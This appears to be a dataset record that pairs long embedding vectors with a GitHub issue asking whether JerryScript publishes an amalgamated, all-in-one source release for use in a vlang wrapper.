0.010757114738225937, -0.0068166740238666534, 0.02345568686723709, 0.0053821527399122715, -0.024951329454779625, 0.004720618948340416, -0.005885493475943804, -0.002685683313757181, 0.026403827592730522, 0.01635138876736164, 0.003059593727812171, -0.016624631360173225, 0.01407916471362114, 0.018451040610671043, -0.0043251365423202515, 0.016121290624141693, -0.000040306596929440275, -0.00019448284001555294, 0.00010527465201448649, -0.020910220220685005, -0.002239867113530636, 0.02994159422814846, 0.007643591612577438, -0.00015942874597385526, -0.008420174941420555, -0.007859309203922749, 0.034687381237745285, 0.018537327647209167, 0.012087373062968254, 0.016135672107338905, -0.004788929596543312, 0.013108436018228531, 0.00465230830013752, 0.01202984806150198, -0.014395550824701786, 0.020291829481720924, -0.003271715948358178, -0.00033638454624451697, -0.0031656548380851746, 0.011562460102140903, -0.006467930972576141, -0.020119255408644676, 0.010944070294499397, -0.00783773697912693, -0.002628158777952194, -0.012763287872076035, 0.02999911829829216, -0.007916833274066448, -0.011972323060035706, -0.0004983973922207952, 0.004361089784651995, -0.004113014321774244, -0.0008421972161158919, -0.03399708494544029, -0.004921955056488514, -0.026864023879170418, 0.004810501355677843, 0.03871410712599754, 0.009002611972391605, -0.022118238732218742, 0.014898891560733318, -0.026432588696479797, -0.01515775267034769, -0.007201370317488909, -0.0018587660742923617, -0.018652375787496567, 0.015776142477989197, -0.013424821197986603, -0.006173117086291313, 0.012842384167015553, -0.00906013697385788, -0.023527592420578003, 0.005087338853627443, 0.0031297020614147186, -0.027640607208013535, 0.008671845309436321, -0.0042676120065152645, -0.006877794396132231, -0.003775056917220354, -0.0011316182790324092, -0.005475630052387714, 0.005612251348793507, 0.018163416534662247, 0.010850592516362667, 0.0036042805295437574, 0.011152597144246101, -0.00030357748619280756, 0.0055798934772610664, -0.020104873925447464, -0.01056296844035387, -0.01561794988811016, 0.011102262884378433, -0.023541973903775215, -0.000015279993021977134, -0.012267136946320534, -0.013647729530930519, 0.002746803220361471, 0.019184479489922523, 0.0006920937448740005, 0.017171116545796394, 0.0001375199353788048, 0.018839331343770027, -0.014927653595805168, -0.0019540414214134216, -0.00362764997407794, -0.004217277746647596, 0.0015846251044422388, -0.013367297127842903, 0.008563986048102379, -0.004738595336675644, -0.004893193021416664, -0.020910220220685005, 0.005119696259498596, 0.006561408285051584, -0.0274824146181345, -0.01258352305740118, -0.00982952956110239, 0.01540223229676485, -0.00020122401474509388, -0.02252091094851494, 0.008758132345974445, -0.0329616405069828, 0.024505512788891792, 0.007352372631430626, -0.002755791647359729, -0.007337991613894701, 0.004515687003731728, -0.017314927652478218, -0.010117152705788612, 0.009966149926185608, 0.0010093783494085073, -0.010469491593539715, -0.0031261066906154156, -0.010606111958622932, 0.019213242456316948, -0.004533663392066956, -0.012540379539132118, 0.006687243934720755, -0.00817569438368082, -0.001918088411912322, 0.012525998055934906, -0.008448936976492405, -0.004781738854944706, -0.015373470261693, -0.010447919368743896, 0.008995421230793, -0.01928514800965786, -0.0002243687049485743, 0.009434047155082226, -0.006435573101043701, -0.011224502697587013, -0.023843979462981224, 0.012712953612208366, 0.017904555425047874, -0.009728861041367054, 0.0033795747440308332, -0.0005550232599489391, 0.0034209205769002438, 0.011548078618943691, 0.012446901760995388, 0.009592239744961262, -0.0021949259098619223, -0.002365702297538519, 0.005288674961775541, 0.007650781888514757, -0.006892175413668156, -0.007909643463790417, 0.0013113828608766198, 0.0028960080817341805, 0.005008242093026638, 0.0030577960424125195, -0.010642065666615963, 0.02080955170094967, 0.026360683143138885, 0.0031081303022801876, 0.00212661549448967, -0.0067591494880616665, -0.03347936272621155, -0.00043458095751702785, 0.02075202763080597, 0.018968762829899788, -0.01077868603169918, -0.017243022099137306, 0.0036815793719142675, 0.0038289863150566816, -0.004379066172987223, 0.002951734932139516, -0.01187884621322155, -0.015603568404912949, 0.0020511143375188112, 0.02509514056146145, -0.0027521962765604258, -0.005989756900817156, -0.003559339325875044, -0.01407916471362114, 0.00048446565051563084, 0.0009230913128703833, -0.019299529492855072, 0.005414510145783424, 0.004012346267700195, -0.0056877522729337215, 0.007000034209340811, -0.009498761966824532, 0.0019630296155810356, -0.012928671203553677, 0.0003145880764350295, -0.0020493166521191597, 0.003476647660136223, -0.01960153318941593, 0.0033993488177657127, -0.0016160839004442096, -0.007115083280950785, -0.008801275864243507, 0.001998982625082135, 0.0038253909442573786, 0.017890173941850662, 0.013065292499959469, 0.011411458253860474, -0.013734016567468643, 0.009570668451488018, 0.00911766104400158, -0.0006718702497892082, 0.0025059187319129705, -0.022751009091734886, 0.002482549287378788, 0.012080182321369648, 0.005209578666836023, -0.023527592420578003, -0.008463318459689617, -0.0037462946493178606, -0.01678282395005226, 0.008657463826239109, -0.015632331371307373, 0.007852118462324142, -0.008743750862777233, 0.01701292395591736, -0.0030434150248765945, 0.004156157840043306, 0.003778652288019657, 0.006500288378447294, -0.004760167095810175, 0.009462809190154076, 0.017127972096204758, -0.025943629443645477, 0.014071973972022533, -0.002221890725195408, 0.013324153609573841, -0.013662111014127731, 0.0011990299681201577, 0.03931811824440956, -0.016883492469787598, -0.012288709171116352, -0.02424665167927742, 0.022995490580797195, 0.012777669355273247, 0.011440220288932323, 0.009865482337772846, -0.012957433238625526, -0.0006017620326019824, 0.022492147982120514, 0.0034173254389315844, 0.0019720178097486496, 0.0019360649166628718, 0.007352372631430626, -0.0065542180091142654, -0.009390903636813164, 0.004583997651934624, -0.0036510194186121225, -0.025210190564393997, 0.008671845309436321, -0.0030308314599096775, 0.013072483241558075, -0.00793121475726366, 0.018091510981321335, 0.018048368394374847, -0.014884510077536106, 0.004573212005198002, -0.021356036886572838, -0.00471342820674181, 0.00023189635248854756, -0.0035341724287718534, 0.022693485021591187, 0.023657023906707764, -0.009836719371378422, 0.011267646215856075, 0.004900383297353983, 0.003354407846927643, 0.01028972677886486, 0.023930266499519348, -0.007578876335173845, -0.0041885157115757465, 0.02056507207453251, 0.009189567528665066, 0.023311875760555267, 0.012518808245658875, -0.0034101346973329782, 0.006831055507063866, -0.020967744290828705, 0.00006628820119658485, -0.0035827087704092264, -0.007000034209340811, 0.0008633195539005101, 0.014187023974955082, -0.00471342820674181, 0.012712953612208366, 0.014826986007392406, -0.013108436018228531, 0.016308246180415154, 0.0007815266726538539, -0.0013203710550442338, -0.022880440577864647, 0.001258352305740118, 0.007435064297169447, 0.02528209611773491, 0.004792524501681328, -0.00592144625261426, -0.0010695994133129716, -0.0016043991781771183, 0.006971271708607674, -0.006708815693855286, -0.010397585108876228, 0.009096089750528336, -0.007586066611111164, -0.0013743004528805614, 0.022017570212483406, -0.02315368317067623, -0.013482346199452877, 0.011921989731490612, -0.002887019654735923, -0.0067843166179955006, -0.0005285079823806882, -0.008434555493295193, 0.0054217008873820305, 0.0020457212813198566, 0.005925041623413563, 0.004238849505782127, -0.0021535800769925117, -0.02528209611773491, 0.01460407767444849, 0.013000576756894588, -0.010498253628611565, 0.012137707322835922, -0.029423872008919716, -0.032300107181072235, 0.012065800838172436, -0.01584804803133011, 0.027640607208013535, 0.01398568693548441, -0.001878540264442563, 0.0007240020204335451, -0.019515246152877808, -0.0018066343618556857, 0.012763287872076035, 0.010095580480992794, -0.009994912892580032, -0.003976393491029739, -0.005177220795303583, -0.0068418411538004875, -0.006831055507063866, 0.03247268125414848, -0.021399179473519325, 0.019083810970187187, 0.007607638370245695, -0.006899366155266762, 0.008930706419050694, -0.008226028643548489, 0.009534715674817562, 0.0011666723294183612, -0.031264662742614746, -0.015330326743423939, 0.00896665919572115, -0.005658990237861872, -0.010498253628611565, 0.00573808653280139, -0.013086863793432713, 0.003926059231162071, -0.005310246720910072, 0.004857239779084921, -0.0002988586784340441, -0.015057084150612354, 0.01659587025642395, 0.005978971254080534, 0.011806939728558064, 0.0009509547962807119, 0.0010830818209797144, 0.0033741819206625223, -0.022118238732218742, -0.0043071601539850235, 0.015589187853038311, 0.024145983159542084, 0.007679544389247894, -0.01453936193138361, -0.003559339325875044, -0.00014358699263539165, 0.002615575212985277, 0.007089916616678238, -0.0028133161831647158, 0.0036654004361480474, -0.01725740358233452, 0.0065362416207790375, -0.0034532782156020403, 0.017314927652478218, 0.007111488375812769, 0.007787403184920549, -0.002353118732571602, 0.008341078646481037, 0.009513143450021744, 0.009462809190154076, 0.009203948080539703, 0.008283553645014763, 0.00908889900892973, 0.011433029547333717, 0.011735034175217152, 0.003149476135149598, 0.0029283654876053333, -0.0033166571520268917, -0.016754062846302986, 0.03557901456952095, 0.0008565784082747996, -0.030660653486847878, -0.0023764881771057844, 0.0013068887637928128, -0.0037067465018481016, 0.01678282395005226, -0.015891192480921745, 0.012065800838172436, 0.004616355523467064, 0.004540854133665562, 0.004882406909018755, -0.004702642560005188, -0.010678018443286419, 0.007873689755797386, -0.0033957536797970533, -0.02841719053685665, -0.000192011080798693, -0.021715566515922546, -0.015603568404912949, -0.009441237896680832, -0.0056877522729337215, -0.016006240621209145, -0.009203948080539703, 0.0014776651514694095, -0.011411458253860474, -0.002038530772551894, -0.00043547977111302316, 0.00632411940023303, 0.00697846245020628, -0.006086830049753189, 0.016926636919379234, 0.00123228644952178, -0.04035356268286705, 0.012231184169650078, 0.009534715674817562, 0.01579052396118641, -0.002511311788111925, -2.808822046063142e-7, 0.012813622131943703, 0.004015941638499498, -0.00538934301584959, -0.02033497393131256, -0.014568124897778034, -0.012734525837004185, -0.005288674961775541, -0.001011175918392837, 0.024706847965717316, 0.0012394770747050643, -0.004299969412386417, -0.007600448094308376, -0.00613716384395957, -0.00790245272219181, 0.012159278616309166, 0.027223553508520126, 0.0016772039234638214, -0.003882915712893009, -0.003753485158085823, 0.004699047189205885, 0.021643659099936485, -0.000183359908987768, 0.040813758969306946, 0.000524912669789046, -0.0031566666439175606, -0.006964081432670355, 0.0022812129464000463, -0.015373470261693, 0.019730964675545692, -0.006572194397449493, 0.011037547141313553, -0.01448183786123991, -0.006349286064505577, 0.00814693234860897, 0.007614829111844301, -0.012741715647280216, -0.023168064653873444, 0.019615914672613144, -0.0037858427967876196, -0.0065973615273833275, -0.00173652614466846, -0.00998053140938282, -0.005781230051070452, -0.006874199025332928, -0.0077730221673846245, 0.005756062921136618, 0.019846012815833092, 0.00771549716591835, 0.01911257393658161, -0.004684665706008673, 0.013360106386244297, 0.017645694315433502, 0.006338500417768955, -0.013079673051834106, 0.01750188320875168, -0.005472035147249699, -0.011684699915349483, -0.008520842529833317, 0.0010390394600108266, 0.012281518429517746, 0.007420683279633522, 0.009901435114443302, 0.0038038191851228476, 0.013662111014127731, -0.008197266608476639, -0.006306142546236515, -0.019946681335568428, -0.01212332583963871, 0.0238152164965868, -0.014338025823235512, 0.0043898518197238445, 0.00019560637883841991, 0.006478716619312763, -0.02172994613647461, -0.023168064653873444, 0.002489740028977394, 0.019026286900043488, 0.02877672016620636, -0.0026389446575194597, 0.016322627663612366, 0.014496218413114548, 0.00399796525016427, 0.012662619352340698, 0.009354950860142708, 0.016020622104406357, 0.018566088750958443, 0.013849065639078617, 0.013640538789331913, 0.024749992415308952, 0.00013594698975794017, -0.01007400918751955, 0.01627948321402073, -0.006503883749246597, -0.01665339432656765, 0.008218837901949883, 0.01518651470541954, -0.035550251603126526, 0.003072177292779088, -0.008693416602909565, 0.01971658319234848, -0.0014048605225980282, -0.002606587018817663, 0.002804327988997102, -0.013396059162914753, 0.006295356899499893, 0.024160364642739296, -0.007427874021232128, -0.0026820881757885218, -0.01337448786944151, 0.040986333042383194, -0.0040411087684333324, -0.0009356748196296394, 0.03834019601345062, -0.0053857481107115746, 0.012410948984324932, 0.008894753642380238, 0.014136689715087414, 0.004400637932121754, 0.01410792674869299, 0.005989756900817156, -0.008858799934387207, 0.028445953503251076, 0.022175762802362442, -0.000715912610758096, -0.030890751630067825, 0.011303598992526531, -0.003528779372572899, -0.015546044334769249, 0.00995176937431097, 0.002025947207584977, 0.0022776175756007433, -0.00973605178296566, -0.015661092475056648, -0.005069361999630928, 0.010886545293033123, -0.017731981351971626, 0.0028978055343031883, -0.01007400918751955, 0.013870637863874435, -0.005396533757448196, -0.008830037899315357, -0.03043055348098278, 0.030142931267619133, 0.010598922148346901, 0.010368823073804379, 0.0043035647831857204, -0.008679036051034927, 0.011389886029064655, 0.01708482950925827, 0.014927653595805168, -0.007215751800686121, -0.003293287707492709, -0.0035341724287718534, -0.02413160167634487, -0.014057593420147896, 0.004055489785969257, 0.021701185032725334, 0.01580490544438362, 0.029740257188677788, -0.007345182355493307, 0.01200108602643013, -0.018508564680814743, -0.009656955488026142, 0.015546044334769249, -0.0056769666261971, 0.0032645254395902157, 0.022333955392241478, -0.010958450846374035, 0.008837228640913963, -0.002416036557406187, 0.012561951763927937, -0.007521351333707571, -0.03011416830122471, 0.0017392226727679372, 0.004037513397634029, -0.004170539323240519, -0.006931723561137915, -0.013827494345605373, -0.005090933758765459, 0.01757378876209259, -0.008197266608476639, -0.007895261980593204, 0.01205861009657383, -0.002266831696033478, 0.02112593688070774, 0.026705831289291382, -0.01847980171442032, 0.024419225752353668, 0.010038056410849094, 0.01150493510067463, -0.01038320455700159, 0.022822916507720947, 0.011159786954522133, -0.01239656750112772, 0.00826917216181755, -0.00759325735270977, -0.011886036023497581, -0.023283112794160843, -0.0005559221026487648, -0.008952277712523937, 0.003498219419270754, -0.020953362807631493, -0.0009878065902739763, -0.0067196013405919075, -0.008930706419050694, 0.011073499917984009, 0.0006453549722209573, 0.002482549287378788, 0.01019624900072813, -0.0035916969645768404, -0.006396024953573942, -0.004932741168886423, 0.019687820225954056, -0.0025796222034841776, -0.0021499847061932087, 0.011756605468690395, 0.0011307194363325834, 0.007643591612577438, 0.023541973903775215, 0.006245022639632225, -0.01922762393951416, 0.0009994913125410676, -0.025871723890304565, -0.0024322152603417635, 0.003735508769750595, 0.023484449833631516, 0.02326873131096363, 0.014575314708054066, -0.004073466174304485, -0.0021230201236903667, -0.005346199497580528, 0.012360614724457264, 0.00908889900892973, 0.0014048605225980282, -0.009563477709889412, -0.006565003655850887, 0.00032177867251448333, 0.006967676337808371, -0.020737646147608757, 0.05076552927494049, 0.011756605468690395, 0.007967167533934116, 0.007057558745145798, 0.006176711991429329, -0.00405908515676856, -0.003649221733212471, -0.01947210356593132, -0.00040896449354477227, 0.008297935128211975, -0.02142794243991375, -0.010591731406748295, 0.013669301755726337, -0.006708815693855286, 0.0012502629542723298, -0.002004375448450446, 0.0030955467373132706, -0.003244751365855336, -0.0038972969632595778, 0.00109386770054698, 0.009994912892580032, -0.011497745290398598, 0.020421260967850685, 0.0003060492454096675, -0.01044072862714529, 0.015373470261693, 0.010908116586506367, -0.014489027671515942, 0.02167242206633091, -0.03416965901851654, 0.008909134194254875, 0.007093511987477541, 0.0020978529937565327, 0.019198860973119736, 0.01389220915734768, 0.003983583766967058, -0.014129498973488808, 0.02308177761733532, -0.009822338819503784, -0.009937387891113758, -0.005842349957674742, 0.0004231209750287235, -0.01819217950105667, -0.007701116148382425, 0.006928128190338612, 0.0015549638774245977, 0.013841875828802586, 0.005116100888699293, 0.0008884866256266832, 0.019874775782227516, -0.006960486061871052, -0.011914798989892006, -0.00930461660027504, 0.01819217950105667, -0.010232201777398586, 0.02155737206339836, 0.010462300851941109, -0.001856968505308032, -0.010951260104775429, -0.00425323098897934, -0.015028322115540504, -0.032731540501117706, -0.010131534188985825, 0.010397585108876228, -0.012065800838172436, 0.005996947642415762, 0.02246338687837124, 0.01719987764954567, -0.02890614978969097, 0.02229081280529499, -0.00022043635544832796, 0.0027054573874920607, 0.0011531900381669402, 0.0031602620147168636, -0.005853136070072651, -0.013122816570103168, 0.012633857317268848, -0.023498831316828728, 0.004458162467926741, 0.004605569411069155, -0.0008862395770847797, 0.0042460402473807335, -0.0021158296149224043, -0.013935352675616741, -0.004382661543786526, -0.00009499436418991536, -0.015517281368374825, 0.004788929596543312, -0.016365770250558853, 0.007873689755797386, 0.005195197183638811, 0.010706780478358269, -0.0028151138685643673, 0.002096055541187525, 0.007140250410884619, -0.011742224916815758, -0.007273276336491108, 0.013324153609573841, 0.001701472094282508, 0.008017501793801785, 0.013108436018228531, 0.005914255976676941, -0.0055007971823215485, -0.005878302734345198, 0.014280500821769238, 0.0024142388720065355, 0.008161313831806183, -0.017660075798630714, -0.01952962763607502, 0.014273310080170631, 0.00961381196975708, 0.01019624900072813, -0.015574806369841099, 0.005493606440722942, 0.013151579536497593, -0.017343690618872643, -0.0069029610604047775, -0.013036529533565044, -0.004788929596543312, -0.022305194288492203, 0.004583997651934624, 0.01732930913567543, 0.03454357013106346, 0.03232887014746666, 0.018781807273626328, 0.008729369379580021, 0.02866167016327381, 0.006547027267515659, 0.008398602716624737, 0.01087216380983591, 0.004601974040269852, -0.007888071238994598, 0.023786453530192375, 0.008621511049568653, 0.00374988978728652, 0.022923583164811134, -0.026892786845564842, 0.02142794243991375, -0.010433537885546684, -0.009441237896680832, 0.003670793492347002, 0.06103368103504181, -0.02174432761967182, -0.014093546196818352, -0.005989756900817156, 0.0019019095925614238, -0.011943561024963856, -0.001839890843257308, -0.004382661543786526, -0.01922762393951416, 0.03880039602518082, 0.02650449424982071, 0.01879618875682354, 0.006971271708607674, -0.01292148046195507, -0.004850049503147602, 0.0031081303022801876, 0.019946681335568428, 0.0043862564489245415, -0.007578876335173845, -0.006996438838541508, 0.005198792554438114, -0.012037038803100586, 0.0031872265972197056, 0.013798732310533524, 0.013144388794898987, 0.009987722150981426, -0.02149984799325466, -0.004666689317673445, -0.014668792486190796, 0.0066225286573171616, -0.006194688845425844, -0.009434047155082226, -0.005310246720910072, 0.00538934301584959, 0.005310246720910072, 0.010721161961555481, 0.003979988396167755, 0.013295390643179417, 0.0056877522729337215, 0.0015846251044422388, 0.018724283203482628, -0.00998053140938282, 0.007643591612577438, 0.021025270223617554, -0.00561584671959281, -0.00731641985476017, 0.0041273958049714565, 0.0016592274187132716, 0.010397585108876228, 0.013453584164381027, -0.021154699847102165, 0.016624631360173225, 0.010670827701687813, -0.02039249800145626, 0.031753621995449066, 0.024649323895573616, -0.00805345457047224, 0.02368578501045704, -0.013403249904513359, 0.0035647323820739985, -0.004681070800870657, -0.000698834948707372, 0.028330903500318527 ]
44
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
Hello there! I noticed the `ENABLE_ALL_IN_ONE` flags within `build.py` and wondered: Are those files intended to be released, and if, is there a stable way to obtain them as releases come out? I am working with a couple of amalgamated projects - sqlite, mongoose just to name a few - and I was wondering if there was such a release for JerryScript. My intend is to create a [vlang](https://github.com/vlang/v) wrapper. In order to keep install/build sizes and times small, I was looking to find an amalgamated version that I could use in that wrapper. Kind regards, Ingwie
Amalgamated JerryScript source release?
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4406/comments
3
2021-01-04T01:36:50
2021-01-11T17:24:21Z
https://github.com/jerryscript-project/jerryscript/issues/4406
777,762,355
4,406
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Amalgamated JerryScript source release? Issue date: --- start body --- Hello there! I noticed the `ENABLE_ALL_IN_ONE` flags within `build.py` and wondered: Are those files intended to be released, and if, is there a stable way to obtain them as releases come out? I am working with a couple of amalgamated projects - sqlite, mongoose just to name a few - and I was wondering if there was such a release for JerryScript. My intend is to create a [vlang](https://github.com/vlang/v) wrapper. In order to keep install/build sizes and times small, I was looking to find an amalgamated version that I could use in that wrapper. Kind regards, Ingwie --- end body ---
746
[ -0.02868952415883541, -0.000776057131588459, -0.02747773379087448, -0.012597895227372646, 0.00543731776997447, -0.00938743818551302, 0.015186719596385956, 0.05161910876631737, -0.054420389235019684, 0.04220806434750557, -0.018066687509417534, -0.02093091979622841, 0.0211984571069479, -0.028516409918665886, 0.016130970790982246, 0.0185230765491724, -0.039217934012413025, -0.02100960724055767, -0.003139637876302004, -0.008946787565946579, 0.02417285181581974, 0.006330422591418028, -0.004807816352695227, 0.010851029306650162, 0.004725194536149502, -0.0008827772689983249, 0.00922219455242157, -0.004087824374437332, -0.04677194729447365, -0.016146710142493248, 0.019624704495072365, -0.01636703498661518, -0.014864100143313408, 0.027949858456850052, -0.011480530723929405, -0.0021147311199456453, 0.021434521302580833, 0.05970820039510727, -0.015296882018446922, 0.004603228531777859, -0.007077955640852451, -0.012416914105415344, -0.02127714455127716, 0.02571512944996357, -0.007758603896945715, 0.07786931842565536, 0.017248336225748062, 0.04261723905801773, 0.02181222103536129, 0.0006634353776462376, -0.011724462732672691, -0.01946732960641384, 0.0030766876880079508, -0.056781020015478134, 0.017720462754368782, -0.03462257236242294, 0.004044546280056238, -0.002091124653816223, 0.04604802280664444, 0.025825291872024536, 0.004437984433025122, -0.02552627958357334, -0.018633238971233368, 0.013243134133517742, -0.002299647079780698, 0.07119660079479218, -0.04699227586388588, 0.029743937775492668, 0.01369952317327261, 0.02565217949450016, 0.0011291679693385959, 0.02006535418331623, 0.02867378666996956, 0.02645479328930378, -0.01594999060034752, -0.02719445712864399, -0.041704464703798294, 0.005307483021169901, 0.007058283779770136, 0.010449722409248352, -0.002996032824739814, -0.005425514653325081, -0.019294215366244316, 0.008159911260008812, -0.014148042537271976, -0.020852232351899147, -0.004898307379335165, -0.053696464747190475, 0.008789412677288055, -0.018538814038038254, 0.00106031633913517, 0.041169386357069016, 0.010040545836091042, -0.02571512944996357, 0.050265680998563766, 0.02854788489639759, -0.031270477920770645, 0.002486530225723982, -0.035787150263786316, -0.01998666673898697, 0.029539350420236588, 0.011039880104362965, 0.007003202568739653, -0.0245820265263319, -0.018349964171648026, 0.05357056483626366, 0.04327821731567383, -0.027635108679533005, 0.010292346589267254, 0.07585491240024567, 0.007601228542625904, -0.018349964171648026, -0.02747773379087448, 0.007011071313172579, -0.028390510007739067, 0.002791445003822446, 0.01047332864254713, -0.04290051758289337, -0.012684452347457409, -0.0032478333450853825, -0.021717796102166176, -0.0036373373586684465, -0.01729554869234562, -0.034496672451496124, -0.03320619463920593, 0.034905847162008286, 0.00078048330033198, -0.02362203784286976, 0.00949760153889656, 0.027147244662046432, -0.06616058945655823, -0.022567622363567352, -0.01971912942826748, -0.02665938064455986, 0.027021344751119614, -0.0158240906894207, 0.027949858456850052, 0.06496454030275345, -0.035787150263786316, -0.010229396633803844, 0.004237330984324217, -0.02780822105705738, 0.033489469438791275, 0.024424651637673378, 0.018664713948965073, -0.0039796289056539536, -0.003466191701591015, 0.037518277764320374, 0.00019782570598181337, -0.014580824412405491, 0.007046480663120747, 0.0024629239924252033, 0.01871192641556263, 0.022048283368349075, 0.001836373470723629, 0.005118632689118385, 0.011936918832361698, 0.03279701992869377, -0.012409045360982418, 0.04000480845570564, -0.0255734920501709, -0.009670713916420937, -0.008002535440027714, 0.007341559510678053, -0.023684987798333168, -0.011118567548692226, 0.03861990571022034, 0.03149080276489258, -0.0061533753760159016, -0.007915979251265526, 0.006456322968006134, 0.004851094447076321, -0.012597895227372646, 0.0014409678988158703, 0.00032507843570783734, 0.014022142626345158, 0.0037042219191789627, -0.01857028901576996, 0.024345964193344116, -0.030404914170503616, 0.005004535429179668, -0.006538945250213146, -0.0038065158296376467, 0.006298947613686323, -0.012975595891475677, -0.012157244607806206, 0.04504081979393959, -0.0030530814547091722, -0.005154042039066553, -0.03651107847690582, 0.01561950147151947, -0.009780877269804478, 0.015210325829684734, -0.015729663893580437, 0.028988536447286606, 0.038147781044244766, -0.03937530890107155, -0.010496934875845909, -0.009450389072299004, -0.027855433523654938, 0.042050689458847046, 0.009686451405286789, -0.03076687827706337, -0.025903979316353798, -0.022772211581468582, -0.004233396612107754, -0.00932448823004961, 0.015611632727086544, 0.03155375272035599, -0.04419099539518356, -0.021355831995606422, 0.0018894876120612025, -0.026627905666828156, -0.020159780979156494, 0.013353297486901283, -0.0008291712729260325, 0.01053627859801054, 0.005205189343541861, -0.016398509964346886, 0.020978132262825966, -0.008356629870831966, -0.004257002845406532, -0.03984743356704712, 0.005157976411283016, -0.004131102468818426, -0.012464126572012901, -0.013479197397828102, 0.022394509986042976, 0.006621567066758871, 0.0356612503528595, 0.010607097297906876, 0.0008832690655253828, 0.015800483524799347, 0.030688190832734108, 0.011527743190526962, -0.001513754017651081, 0.0046386378817260265, -0.007286477833986282, 0.014525743201375008, 0.028783949092030525, 0.008395973592996597, -0.0245820265263319, -0.01723259873688221, -0.06603468954563141, 0.006424847990274429, 0.00509896082803607, -0.009174982085824013, 0.007463525049388409, -0.03326914459466934, 0.0013544114772230387, -0.007581556681543589, 0.016681784763932228, 0.007148774340748787, -0.053224336355924606, -0.05999147891998291, 0.0350002758204937, -0.005508136469870806, 0.05161910876631737, -0.02174927107989788, -0.039690058678388596, -0.029303286224603653, -0.002620299346745014, -0.010607097297906876, 0.017059486359357834, -0.05290958657860756, -0.0009019573917612433, -0.047495875507593155, -0.008994000032544136, -0.006987464614212513, 0.0012029376812279224, 0.032073091715574265, -0.04274313896894455, -0.0195145420730114, 0.05089518427848816, -0.019845029339194298, 0.005740265361964703, 0.008380236104130745, 0.03852548077702522, 0.0067159924656152725, -0.01481688767671585, -0.003737664083018899, 0.004319952800869942, 0.054294489324092865, 0.014620168134570122, -0.016272610053420067, 0.013880504295229912, 0.01710669882595539, -0.02437743917107582, -0.03459109738469124, -0.03855695575475693, -0.0178463626652956, -0.0225518848747015, -0.007278609089553356, 0.008293679915368557, 0.025699391961097717, 0.008616299368441105, 0.005394039675593376, 0.01484049391001463, -0.0005060600815340877, 0.030735403299331665, -0.037329427897930145, -0.011818887665867805, 0.015021475963294506, 0.007758603896945715, -0.01551720779389143, -0.00329111167229712, -0.012542814016342163, 0.01588704064488411, -0.007432050071656704, -0.029177386313676834, 0.017327023670077324, -0.02848493494093418, -0.029256073758006096, -0.02094665728509426, -0.016807686537504196, 0.03607042506337166, 0.03808483108878136, 0.0008281876798719168, -0.014352630823850632, -0.021890908479690552, -0.021166982129216194, -0.0031357035040855408, -0.036857303231954575, 0.01770472526550293, 0.02867378666996956, -0.01953027956187725, -0.013337559066712856, -0.024519076570868492, 0.03754975274205208, -0.02215844765305519, 0.01986076682806015, -0.02881542406976223, -0.01998666673898697, -0.007640572264790535, -0.01630408503115177, -0.05696986988186836, -0.03676287829875946, 0.0035979936365038157, 0.05637184530496597, -0.023275811225175858, -0.025132840499281883, -0.01636703498661518, -0.018743401393294334, -0.013140840455889702, 0.025620704516768456, -0.03764418140053749, -0.03260817006230354, 0.04268018901348114, 0.044002141803503036, -0.004831422585994005, 0.00104359514079988, -0.006424847990274429, 0.029995739459991455, 0.00841958075761795, 0.01276313979178667, -0.017421448603272438, -0.017547350376844406, -0.03669992834329605, -0.001963257323950529, 0.05728461965918541, -0.0051265014335513115, -0.021513208746910095, 0.01899520307779312, 0.007274674717336893, -0.01569032110273838, 0.037675656378269196, -0.006047147326171398, -0.028233135119080544, 0.0003299964009784162, 0.015997203066945076, -0.012959858402609825, 0.008214992471039295, -0.01201560627669096, -0.022913848981261253, -0.000019779497961280867, -0.018664713948965073, 0.027855433523654938, 0.002252434380352497, -0.006440585479140282, 0.020616168156266212, -0.010166446678340435, 0.00814417377114296, 0.005252401810139418, -0.010921848006546497, 0.007495000027120113, 0.0034838963765650988, 0.02072633057832718, 0.032151781022548676, 0.0029212795197963715, -0.008002535440027714, 0.007742866408079863, 0.04066578671336174, 0.0117874126881361, -0.03267112001776695, -0.05640332028269768, 0.03792745620012283, 0.008742200210690498, -0.020506005734205246, 0.004855028819292784, 0.015611632727086544, -0.01864897646009922, -0.05171353369951248, 0.0015117868315428495, -0.01225166954100132, -0.005846493411809206, 0.004036677535623312, 0.00841958075761795, -0.009780877269804478, -0.006928449030965567, 0.0024117769207805395, -0.020443055778741837, -0.01805095002055168, -0.013219527900218964, 0.017389973625540733, 0.02665938064455986, -0.007144839968532324, 0.014990000054240227, -0.019608967006206512, -0.006578288972377777, -0.00658222334459424, -0.0066373045556247234, -0.01661883480846882, -0.0037219265941530466, 0.009654976427555084, -0.028610834851861, -0.011543480679392815, 0.00864777434617281, 0.011118567548692226, -0.01047332864254713, -0.02094665728509426, 0.019026678055524826, 0.009088425897061825, 0.04966765642166138, -0.013424116186797619, 0.029256073758006096, -0.008002535440027714, -0.023275811225175858, 0.008435318246483803, -0.0039796289056539536, -0.015713926404714584, 0.03540945053100586, 0.052405986934900284, -0.009403176605701447, -0.024597764015197754, 0.0020517809316515923, -0.01161429937928915, -0.04535556957125664, -0.021151244640350342, 0.016052283346652985, -0.0010534311877563596, 0.006519273389130831, 0.022646309807896614, -0.039280883967876434, 0.0025199726223945618, 0.01133889239281416, -0.0423969142138958, -0.03471699729561806, 0.009411045350134373, 0.022268610075116158, 0.0014006404671818018, 0.04932142794132233, 0.012936252169311047, 0.020978132262825966, 0.01926274038851261, -0.03849400579929352, -0.005299614276736975, -0.020568955689668655, -0.05879542604088783, 0.007310084067285061, -0.01628834754228592, -0.04437984526157379, 0.014832625165581703, 0.027225932106375694, 0.018208326771855354, -0.013746735639870167, -0.02288237400352955, 0.022457459941506386, -0.06269833445549011, -0.0010573655599728227, -0.02935050055384636, 0.009765139780938625, -0.015391307882964611, 0.006204522680491209, 0.05404268950223923, -0.01131528615951538, -0.021434521302580833, 0.0006063868058845401, 0.04000480845570564, 0.04154708981513977, 0.03855695575475693, 0.026769544929265976, -0.020647643133997917, -0.024959728121757507, -0.033772747963666916, -0.018759138882160187, 0.03191571682691574, -0.007345493882894516, 0.008411712013185024, 0.014384105801582336, -0.0005670430255122483, -0.009214325807988644, -0.021182719618082047, 0.026171518489718437, -0.017342761158943176, 0.007164511829614639, 0.025998404249548912, -0.01259002648293972, 0.05338171496987343, 0.004851094447076321, 0.0025180054362863302, -0.002935050055384636, -0.010355296544730663, 0.00160326121840626, -0.030719665810465813, 0.010182184167206287, -0.032293420284986496, 